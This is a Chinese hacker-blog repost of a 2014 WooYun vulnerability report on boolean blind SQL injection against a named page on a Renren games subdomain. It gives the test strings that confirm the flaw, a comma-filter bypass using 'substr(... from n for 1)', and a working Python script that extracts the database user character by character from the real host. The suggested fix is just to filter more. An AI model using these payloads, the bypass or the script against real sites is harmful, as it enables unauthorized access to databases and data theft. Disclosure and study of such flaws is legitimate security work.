记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

人人网某站root权限盲注(附利用技巧)

2014-11-16 13:30

漏洞页面 http://app.games.renren.com/tags.php?tag=航海之王 为bool型盲注 http://app.games.renren.com/tags.php?tag=航海之王Ž‹' and ''=' 与 http://app.games.renren.com/tags.php?tag=航海之王Ž‹' and '1'=' 页面不同

漏洞证明:

经分析,过滤了, < > 给我们的利用带来了一定的难度。

主要是在利用substr(user(),1,1)的时候会出现问题。

这里有一个小技巧,以上的语句等价于substr(user() from 1 for 1),绕过了逗号,就可以继续注入了。

手工太浪费时间,写一个python脚本自己去跑吧



code 区域
# -*- coding: utf-8 -*-  

import urllib2

import re



pattern = re.compile(r'2012-09-06')#此处是关键字



for count in range(1,100):

for character in range(0,128):

payload = 'user()'

request = urllib2.Request('http://app.games.renren.com/tags.php?tag=%E8%88%AA%E6%B5%B7%E4%B9%8B%E7%8E%8B%27%20and%20ascii%28substr%28' + payload + '%20from%20' + str(count) +'%20for%201%29%29=' + str(character) + '%23')

request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0')

response = urllib2.urlopen(request)

#print character,

match = pattern.search(response.read())

if match:

if character == 0:

exit(0)

else:

print '%d --- %s' % (count, chr(character))

#print match.group()

break





结果如下:

renren.jpg

修复方案:

再过滤吧

知识来源: www.wooyun.org/bugs/wooyun-2014-078099

阅读:272180 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“人人网某站root权限盲注(附利用技巧)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词